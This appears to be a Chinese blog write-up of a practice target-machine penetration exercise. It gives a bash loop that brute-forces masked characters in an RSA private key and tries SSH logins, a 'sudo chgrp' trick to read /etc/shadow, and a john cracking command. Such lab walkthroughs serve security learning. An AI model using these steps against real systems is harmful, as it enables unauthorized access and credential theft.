靶机渗透日记

于 2022-03-23 15:00:00 发布
阅读量333 收藏
点赞数
文章标签: 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/123679836
版权

  1. IP

  2. 端口

    在这里插入图片描述

  3. 访问80端口,空白页面

    在这里插入图片描述

  4. 目录扫描

    在这里插入图片描述

  5. 访问 sshnote.txt

    在这里插入图片描述

    根据提示,RSA key 中的三个大写字母被*号替换了,并且用户为 sophie

  6. 利用网站中的cookie

    在这里插入图片描述

    base64解码为 poisonedgift.txt ,访问得到私钥保存为 id_rsa

    在这里插入图片描述

  7. 生成三个大写字母的字典

    crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > dict.txt

    创建存在 id_rsa 的目录

    mkdir keysdir

    创建脚本

    #!/bin/bash
key=id_rsa
keys=keysdir
dict=dict.txt

for i in $(cat $dict); do
echo $i
sed "s/\*\*\*/$i/" $key > $keys/$i.rsa
clear
done;

cd keysdir
chmod 600 *

for k in $(ls -1 *); do
echo $k
ssh -i $k sophie@192.168.7.222 2>/dev/null
clear
done;

    在这里插入图片描述

  8. 执行sudo -l

    在这里插入图片描述

    chgrp命令用来改变文件或目录所属的用户组,现在可以更改 /etc/shadow 文件,查看密码hash

     sudo chgrp sophie /etc/shadow

    查看该文件

    在这里插入图片描述

    得到root用户的密码hash

  9. 使用 john 解密

    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

    在这里插入图片描述

    通过密码即可切换到root用户

# .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习 DC3靶机渗透测试练习是网络安全领域中的一个重要实践项目,旨在帮助安全测试人员和渗透测试人员提高自己的技能和经验。本文将详细介绍 DC3靶机渗透测试练习的各个阶段和步骤,以及每个阶段的...
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机是安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
DVWA Web渗透靶机
07-31
**DVWA(Damn Vulnerable Web Application)**是一个广泛使用的开源Web应用程序,专为网络安全专业人员、学生和教师设计,提供了一个安全的学习环境,用于实践Web应用程序渗透测试的技术和方法。这个应用包含了各种...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
DC-4-Web渗透测试靶机
最新发布
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
渗透入门Mr-robott靶机练习.doc
07-09
渗透测试靶机Mr-Robot实践指南 渗透测试是一种网络安全测试,旨在评估计算机系统或网络的安全性。作为一名渗透测试员,需要掌握各种技术和工具来检测和利用系统漏洞。下面是Mr-Robot靶机的实践指南,旨在帮助初学者...
靶机数据窃取渗透实验.zip
07-03
本实验“靶机数据窃取渗透实验”旨在模拟黑客攻击过程,揭示数据安全的脆弱性,并提供防范措施的学习机会。 首先,我们要了解渗透测试。渗透测试是一种授权的安全测试,目的是评估计算机系统、网络或应用程序的安全...
OWASP靶机、安全学习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
【HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值